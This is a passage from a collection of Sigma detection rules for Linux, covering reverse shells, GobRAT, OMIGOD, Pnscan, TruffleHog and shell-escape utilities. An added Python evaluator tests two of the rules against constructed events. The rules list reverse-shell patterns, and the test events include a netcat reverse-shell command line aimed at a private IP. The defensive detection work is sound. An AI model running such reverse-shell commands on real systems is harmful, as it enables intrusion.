    "content": "title: Potential GobRAT File Discovery Via Grep\nid: e34cfa0c-0a50-4210-9cb3-5632d08eb041\nstatus: test\ndescription: Detects the use of grep to discover specific files created by the GobRAT malware\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/grep'\n        CommandLine|contains:\n            - 'apached'\n            - 'frpc'\n            - 'sshd.sh'\n            - 'zone.arm'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml",
    "content": "title: Named Pipe Created Via Mkfifo\nid: 9d779ce8-5256-4b13-8b6f-b91c602b43f4\nstatus: test\ndescription: Detects the creation of a new named pipe using the \"mkfifo\" utility\nreferences:\n    - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/mkfifo'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml",
    "content": "title: Potentially Suspicious Named Pipe Created Via Mkfifo\nid: 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a\nrelated:\n    - id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4\n      type: derived\nstatus: test\ndescription: Detects the creation of a new named pipe using the \"mkfifo\" utility in a potentially suspicious location\nreferences:\n    - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/mkfifo'\n        # Note: Add more potentially suspicious locations\n        CommandLine|contains: ' /tmp/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml",
    "content": "title: Mount Execution With Hidepid Parameter\nid: ec52985a-d024-41e3-8ff6-14169039a0b3\nstatus: test\ndescription: Detects execution of the \"mount\" command with the \"hidepid\" parameter, which hides processes from other users on the system\nreferences:\n    - https://blogs.blackberry.com/\n    - https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/\n    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-01-12\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1564\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/mount'\n        CommandLine|contains|all:\n            - 'hidepid=2'\n            - ' -o '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml",
    "content": "title: Potential Netcat Reverse Shell Execution\nid: 7f734ed0-4f47-46c0-837f-6ee62505abd9\nstatus: test\ndescription: Detects execution of netcat with the \"-e\" flag followed by common shells. This could be a sign of a potential reverse shell setup.\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\n    - https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/\n    - https://www.infosecademy.com/netcat-reverse-shells/\n    - https://man7.org/linux/man-pages/man1/ncat.1.html\nauthor: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2023-04-07\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_nc:\n        Image|endswith:\n            - '/nc'\n            - '/ncat'\n    selection_flags:\n        CommandLine|contains:\n            - ' -c '\n            - ' -e '\n    selection_shell:\n        CommandLine|contains:\n            - ' ash'\n            - ' bash'\n            - ' bsh'\n            - ' csh'\n            - ' ksh'\n            - ' pdksh'\n            - ' sh'\n            - ' tcsh'\n            - '/bin/ash'\n            - '/bin/bash'\n            - '/bin/bsh'\n            - '/bin/csh'\n            - '/bin/ksh'\n            - '/bin/pdksh'\n            - '/bin/sh'\n            - '/bin/tcsh'\n            - '/bin/zsh'\n            - '$IFSash'\n            - '$IFSbash'\n            - '$IFSbsh'\n            - '$IFScsh'\n            - '$IFSksh'\n            - '$IFSpdksh'\n            - '$IFSsh'\n            - '$IFStcsh'\n            - '$IFSzsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_nice_shell_execution.yml",
    "content": "title: Shell Execution via Nice - Linux\nid: 093d68c7-762a-42f4-9f46-95e79142571a\nstatus: test\ndescription: |\n    Detects the use of the \"nice\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or breaking out of restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/nice/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/nice'\n        CommandLine|endswith:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_nohup.yml",
    "content": "title: Nohup Execution\nid: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2\nstatus: test\ndescription: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments\nreferences:\n    - https://gtfobins.github.io/gtfobins/nohup/\n    - https://en.wikipedia.org/wiki/Nohup\n    - https://www.computerhope.com/unix/unohup.htm\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2022-06-06\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/nohup'\n    condition: selection\nfalsepositives:\n    - Administrators or installed processes that leverage nohup\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml",
    "content": "title: Suspicious Nohup Execution\nid: 457df417-8b9d-4912-85f3-9dbda39c3645\nrelated:\n    - id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2\n      type: derived\nstatus: test\ndescription: Detects execution of binaries located in potentially suspicious locations via \"nohup\"\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.execution\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/nohup'\n        CommandLine|contains: '/tmp/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml",
    "content": "title: OMIGOD SCX RunAsProvider ExecuteScript\nid: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db\nstatus: test\ndescription: |\n    Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\n    Script being executed gets created as a temp file in /tmp folder with a scx* prefix.\n    Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\n    The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\n    Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\nreferences:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://github.com/Azure/Azure-Sentinel/pull/3059\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2022-10-05\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.execution\n    - attack.t1068\n    - attack.t1190\n    - attack.t1203\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        User: root\n        LogonId: 0\n        CurrentDirectory: '/var/opt/microsoft/scx/tmp'\n        CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SCX RunAsProvider ExecuteScript.\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml",
    "content": "title: OMIGOD SCX RunAsProvider ExecuteShellCommand\nid: 21541900-27a9-4454-9c4c-3f0a4240344a\nstatus: test\ndescription: |\n    Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\n    SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\n    Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\nreferences:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://github.com/Azure/Azure-Sentinel/pull/3059\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2022-10-05\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.execution\n    - attack.t1068\n    - attack.t1190\n    - attack.t1203\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        User: root\n        LogonId: 0\n        CurrentDirectory: '/var/opt/microsoft/scx/tmp'\n        CommandLine|contains: '/bin/sh'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml",
    "content": "title: Potential Perl Reverse Shell Execution\nid: 259df6bc-003f-4306-9f54-4ff1a08fa38e\nstatus: test\ndescription: Detects execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2023-04-07\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/perl'\n        CommandLine|contains: ' -e '\n    selection_content:\n        - CommandLine|contains|all:\n              - 'fdopen('\n              - '::Socket::INET'\n        - CommandLine|contains|all:\n              - 'Socket'\n              - 'connect'\n              - 'open'\n              - 'exec'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml",
    "content": "title: Potential PHP Reverse Shell\nid: c6714a24-d7d5-4283-a36b-3ffd091d5f7e\nstatus: test\ndescription: |\n    Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\n    Attackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: '@d4ns4n_'\ndate: 2023-04-07\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|contains: '/php'\n        CommandLine|contains|all:\n            - ' -r '\n            - 'fsockopen'\n        CommandLine|contains:\n            - 'ash'\n            - 'bash'\n            - 'bsh'\n            - 'csh'\n            - 'ksh'\n            - 'pdksh'\n            - 'sh'\n            - 'tcsh'\n            - 'zsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_pnscan_binary_cli_pattern.yml",
    "content": "title: Pnscan Binary Data Transmission Activity\nid: 97de11cd-4b67-4abf-9a8b-1020e670aa9e\nstatus: test\ndescription: |\n    Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.\n    This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT\nauthor: David Burkett (@signalblur)\ndate: 2024-04-16\nreferences:\n    - https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence\n    - https://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf\n    - https://regex101.com/r/RugQYK/1\n    - https://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        CommandLine|re: -(W|R)\\s?(\\s|\"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|\"|')\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
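Added example (not a file of the Sigma repository and not the project's own code): a small Python evaluator for the subset of Sigma syntax the rules above use, run over constructed process_creation events. It is applied to the detection sections of the netcat reverse shell rule (shell list shortened) and the Pnscan regex rule. The benign grep event is constructed to show a caveat of the Pnscan regex: any `-R`/`-W` followed by a quoted run of hex-looking pairs fires it, so the rule's "medium" level and "Unknown" false positives deserve a tuning pass before deployment.

```python
"""Minimal evaluator for the Sigma subset used by the rules above.

Added example, not code from the Sigma project. It understands the field
modifiers endswith / startswith / contains / contains|all / re and the
conditions "selection", "all of selection_*" and "1 of selection_*", and
mirrors Sigma's case-insensitive string matching (|re stays case-sensitive).
The events at the bottom are constructed, not real telemetry.
"""
import fnmatch
import re


def _match_one(value, modifiers, pattern):
    """Compare one field value against one pattern under the given modifiers."""
    if "re" in modifiers:
        return re.search(pattern, value) is not None
    value, pattern = value.lower(), str(pattern).lower()
    if "endswith" in modifiers:
        return value.endswith(pattern)
    if "startswith" in modifiers:
        return value.startswith(pattern)
    if "contains" in modifiers:
        return pattern in value
    return value == pattern


def _field_matches(event, key, pattern):
    """'Field|mod1|mod2': a list of patterns is OR-ed unless |all is present."""
    field, *modifiers = key.split("|")
    value = event.get(field)
    if value is None:
        return False
    patterns = pattern if isinstance(pattern, list) else [pattern]
    combine = all if "all" in modifiers else any
    return combine(_match_one(str(value), modifiers, p) for p in patterns)


def _selection_matches(event, selection):
    """A map is an AND over its fields; a list of maps is an OR over the maps."""
    if isinstance(selection, list):
        return any(_selection_matches(event, s) for s in selection)
    return all(_field_matches(event, k, v) for k, v in selection.items())


def rule_matches(detection, event):
    """Evaluate a rule's 'detection' section against one event."""
    condition = detection["condition"].strip()
    selections = {k: v for k, v in detection.items() if k != "condition"}
    quantified = re.fullmatch(r"(all|1) of (\S+)", condition)
    if not quantified:
        return _selection_matches(event, selections[condition])
    quantifier, name_glob = quantified.groups()
    hits = [_selection_matches(event, sel)
            for name, sel in selections.items() if fnmatch.fnmatch(name, name_glob)]
    return all(hits) if quantifier == "all" else any(hits)


def run(detection, events):
    """Return one boolean per event: did the rule fire?"""
    return [rule_matches(detection, e) for e in events]


# Detection sections of two rules on this page (netcat shell list shortened).
NETCAT_REVERSE_SHELL = {
    "selection_nc": {"Image|endswith": ["/nc", "/ncat"]},
    "selection_flags": {"CommandLine|contains": [" -c ", " -e "]},
    "selection_shell": {"CommandLine|contains": [" bash", " sh", "/bin/bash", "/bin/sh", "$IFSbash"]},
    "condition": "all of selection_*",
}
PNSCAN_BINARY_DATA = {
    "selection": {"CommandLine|re": r"""-(W|R)\s?(\s|"|')([0-9a-fA-F]{2}\s?){2,20}(\s|"|')"""},
    "condition": "selection",
}

# Constructed process_creation events.
EVENTS = [
    {"Image": "/usr/bin/nc", "CommandLine": "nc -e /bin/bash 10.0.0.5 4444"},  # reverse shell
    {"Image": "/usr/bin/nc", "CommandLine": "nc -lvnp 4444"},                   # plain listener
    {"Image": "/usr/bin/ncat", "CommandLine": "ncat -c bash 10.0.0.5 4444"},   # -c variant
    {"Image": "/usr/local/bin/pnscan",
     "CommandLine": 'pnscan -W "50 4f 53 54 20 2f" -R "48 54 54 50" 10.0.0.0/24 6379'},
    {"Image": "/usr/bin/grep", "CommandLine": "grep -R 'de ad be ef' /var/log"},  # benign, yet -R + quoted hex pairs fires
]

if __name__ == "__main__":
    print("netcat:", run(NETCAT_REVERSE_SHELL, EVENTS))  # [True, False, True, False, False]
    print("pnscan:", run(PNSCAN_BINARY_DATA, EVENTS))    # [False, False, False, True, True]
```

Two points the run makes concrete. Plain string modifiers are case-insensitive per the Sigma specification, so `NC -E /BIN/SH` still matches; `|re` is not, so a regex rule needs its own case handling. The `$IFS` patterns in the netcat rule only help when the pre-expansion command line is logged (for example through a `sh -c` wrapper): the shell expands an unquoted `$IFS` into word separators before `nc` is executed, so the child's process_creation event records the already-expanded `nc -e /bin/bash` argv.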
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml",
    "content": "title: Connection Proxy\nid: 72f4ab3f-787d-495d-a55d-68c2ff46cf4c\nstatus: test\ndescription: Detects setting proxy configuration\nauthor: Ömer Günal\ndate: 2020-06-17\nmodified: 2022-10-05\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'http_proxy='\n            - 'https_proxy='\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_pua_trufflehog.yml",
    "content": "title: PUA - TruffleHog Execution - Linux\nid: d7a650c4-226c-451e-948f-cc490db506aa\nrelated:\n    - id: 44030449-b0df-4c94-aae1-502359ab28ee\n      type: similar\nstatus: experimental\ndescription: |\n    Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.\n    While it is a legitimate tool, intended for use in CI pipelines and security assessments,\n    it was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.\nreferences:\n    - https://github.com/trufflesecurity/trufflehog\n    - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1083\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/trufflehog'\n    selection_cli_platform:\n        CommandLine|contains:\n            - ' docker --image '\n            - ' Git '\n            - ' GitHub '\n            - ' Jira '\n            - ' Slack '\n            - ' Confluence '\n            - ' SharePoint '\n            - ' s3 '\n            - ' gcs '\n    selection_cli_verified:\n        CommandLine|contains: ' --results=verified'\n    condition: selection_img or all of selection_cli_*\nfalsepositives:\n    - Legitimate use of TruffleHog by security teams or developers.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_python_http_server_execution.yml",
    "content": "title: Python WebServer Execution - Linux\nid: 3f0f5957-04f8-4792-ad89-192b0303bde6\nstatus: experimental\ndescription: |\n    Detects the execution of Python web servers via command line interface (CLI).\n    After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.\n    This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.\nreferences:\n    - https://www.atomicredteam.io/atomic-red-team/atomics/T1048.003#atomic-test-8---python3-httpserver\n    - https://docs.python.org/3/library/http.server.html\n    - https://docs.python.org/2/library/simplehttpserver.html\nauthor: Mohamed LAKRI\ndate: 2025-10-17\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '/python'\n              - '/python2'\n              - '/python3'\n        - Image|contains:\n              - '/python2.'  # python image is always of the form ../python3.10; ../python is just a symlink\n              - '/python3.'\n    selection_module:\n        CommandLine|contains:\n            - 'http.server'\n            - 'SimpleHTTPServer'\n    condition: all of selection_*\nfalsepositives:\n    - Testing or development activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml",
    "content": "title: Python Spawning Pseudo-Terminal Via PTY Module\nid: c4042d54-110d-45dd-a0e1-05c47822c937\nrelated:\n    - id: 32e62bc7-3de0-4bb1-90af-532978fe42c0\n      type: similar\nstatus: test\ndescription: |\n    Detects a python process calling the PTY module in order to spawn a pseudo-terminal (pty), which could be indicative of potential reverse shell activity.\nreferences:\n    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\nauthor: Nextron Systems\ndate: 2022-06-03\nmodified: 2024-11-04\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '/python'\n              - '/python2'\n              - '/python3'\n        - Image|contains:\n              - '/python2.'  # python image is always of the form ../python3.10; ../python is just a symlink\n              - '/python3.'\n    selection_cli_import:\n        CommandLine|contains:\n            - 'import pty'\n            - 'from pty '\n    selection_cli_spawn:\n        CommandLine|contains: 'spawn'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml",
    "content": "title: Python Reverse Shell Execution Via PTY And Socket Modules\nid: 32e62bc7-3de0-4bb1-90af-532978fe42c0\nrelated:\n    - id: c4042d54-110d-45dd-a0e1-05c47822c937\n      type: similar\nstatus: test\ndescription: |\n    Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.\nreferences:\n    - https://www.revshells.com/\nauthor: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2023-04-24\nmodified: 2024-11-04\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|contains: 'python'\n        CommandLine|contains|all:\n            - ' -c '\n            - 'import'\n            - 'pty'\n            - 'socket'\n            - 'spawn'\n            - '.connect'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_python_shell_os_system.yml",
    "content": "title: Inline Python Execution - Spawn Shell Via OS System Library\nid: 2d2f44ff-4611-4778-a8fc-323a0e9850cc\nstatus: test\ndescription: |\n    Detects execution of inline Python code via the \"-c\" flag in order to call the \"system\" function from the \"os\" library and spawn a shell.\nreferences:\n    - https://gtfobins.github.io/gtfobins/python/#shell\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '/python'\n              - '/python2'\n              - '/python3'\n        - Image|contains:\n              - '/python2.'  # python image is always of the form ../python3.10; ../python is just a symlink\n              - '/python3.'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -c '\n            - 'os.system('\n        CommandLine|contains:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml",
    "content": "title: Remote Access Tool - Team Viewer Session Started On Linux Host\nid: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d\nrelated:\n    - id: ab70c354-d9ac-4e11-bbb6-ec8e3b153357\n      type: similar\n    - id: f459ccb4-9805-41ea-b5b2-55e279e2424a\n      type: similar\nstatus: test\ndescription: |\n    Detects the command line executed when TeamViewer starts a session initiated by a remote host.\n    Once a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\nreferences:\n    - Internal Research\nauthor: Josh Nickels, Qi Nan\ndate: 2024-03-11\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        ParentImage|endswith: '/TeamViewer_Service'\n        Image|endswith: '/TeamViewer_Desktop'\n        CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of TeamViewer\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml",
    "content": "title: Linux Remote System Discovery\nid: 11063ec2-de63-4153-935e-b1a8b9e616f1\nstatus: test\ndescription: Detects the enumeration of other remote systems.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-22\nmodified: 2021-11-27\ntags:\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_1:\n        Image|endswith: '/arp'\n        CommandLine|contains: '-a'\n    selection_2:\n        Image|endswith: '/ping'\n        CommandLine|contains:\n            - ' 10.' # 10.0.0.0/8\n            - ' 192.168.' # 192.168.0.0/16\n            - ' 172.16.' # 172.16.0.0/12\n            - ' 172.17.'\n            - ' 172.18.'\n            - ' 172.19.'\n            - ' 172.20.'\n            - ' 172.21.'\n            - ' 172.22.'\n            - ' 172.23.'\n            - ' 172.24.'\n            - ' 172.25.'\n            - ' 172.26.'\n            - ' 172.27.'\n            - ' 172.28.'\n            - ' 172.29.'\n            - ' 172.30.'\n            - ' 172.31.'\n            - ' 127.' # 127.0.0.0/8\n            - ' 169.254.' # 169.254.0.0/16\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_remove_package.yml",
    "content": "title: Linux Package Uninstall\nid: 95d61234-7f56-465c-6f2d-b562c6fedbc4\nstatus: test\ndescription: Detects Linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\", \"dpkg\" or \"rpm\".\nreferences:\n    - https://sysdig.com/blog/mitre-defense-evasion-falco\n    - https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command\n    - https://linuxhint.com/uninstall_yum_package/\n    - https://linuxhint.com/uninstall-debian-packages/\nauthor: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-09\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_yum:\n        Image|endswith: '/yum'\n        CommandLine|contains:\n            - 'erase'\n            - 'remove'\n    selection_apt:\n        Image|endswith:\n            - '/apt'\n            - '/apt-get'\n        CommandLine|contains:\n            - 'remove'\n            - 'purge'\n    selection_dpkg:\n        Image|endswith: '/dpkg'\n        CommandLine|contains:\n            - '--remove '\n            - ' -r '\n    selection_rpm:\n        Image|endswith: '/rpm'\n        CommandLine|contains: ' -e '\n    condition: 1 of selection_*\nfalsepositives:\n    - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_rsync_shell_execution.yml",
    "content": "title: Shell Execution via Rsync - Linux\nid: e2326866-609f-4015-aea9-7ec634e8aa04\nstatus: experimental\ndescription: |\n    Detects the use of the \"rsync\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/rsync/#shell\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth\ndate: 2024-09-02\nmodified: 2025-01-18\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/rsync'\n            - '/rsyncd'\n        CommandLine|contains: ' -e '\n    selection_cli:\n        CommandLine|contains:\n            - '/ash '\n            - '/bash '\n            - '/dash '\n            - '/csh '\n            - '/sh '\n            - '/zsh '\n            - '/tcsh '\n            - '/ksh '\n            - \"'ash \"\n            - \"'bash \"\n            - \"'dash \"\n            - \"'csh \"\n            - \"'sh \"\n            - \"'zsh \"\n            - \"'tcsh \"\n            - \"'ksh \"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate cases in which \"rsync\" is used to execute a shell\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml",
